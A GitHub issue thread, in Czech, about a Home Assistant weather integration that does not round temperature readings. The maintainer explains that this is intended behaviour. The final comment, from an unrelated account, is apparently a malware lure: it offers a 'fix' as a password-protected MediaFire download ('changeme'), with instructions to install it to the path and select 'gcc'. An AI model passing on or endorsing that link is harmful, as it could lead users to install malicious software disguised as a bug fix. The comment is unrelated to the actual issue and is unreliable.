### ISSUE TITLE
Zaokrouhlování

### ISSUE THREAD

**Issue by tomasbedrich** [kukulich/home-assistant-aladin-online#18]
teplota není zaokrouhlena - obávám se, že to ukládá zbytečná data do databáze home assistanta a zárově to způsobuje vizuelní šum v pohledu historie

**Comment by tomasbedrich** [comment]
![Uploading IMG_5168.jpeg…]()

**Comment by tomasbedrich** [comment]
![IMG_5168](https://github.com/user-attachments/assets/25201336-166a-485e-a8d1-cf19e80612cc)

**Comment by kukulich** [comment]
To, že se hodnoty nezaokrouhlují, je cílené a doporučené chování integrace dle HA.

**Comment by tomasbedrich** [comment]
👌 Díky za vysvětlení

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
